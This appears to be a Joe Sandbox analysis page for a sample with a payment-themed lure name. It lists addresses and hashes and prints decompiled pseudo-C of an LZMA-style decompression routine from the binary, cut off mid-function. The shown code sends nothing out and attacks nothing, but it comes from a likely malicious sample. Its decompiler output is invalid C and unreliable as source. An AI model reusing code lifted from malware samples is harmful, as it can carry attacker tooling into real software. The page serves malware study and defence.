0x00000000
0x00000000
0x00406e29
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407395
0x00407399
0x004073bb
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00407458
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407543
0x00407546
0x00407447
0x00407447
0x00407447
0x00000000
0x0040744d
0x00000000
0x0040717d
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00000000
0x00000000
0x00000000
0x004071c2
0x004071c2
0x004071c5
0x004071fb
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x004075bd
0x00000000
0x004075bd
0x00407339
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725b
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
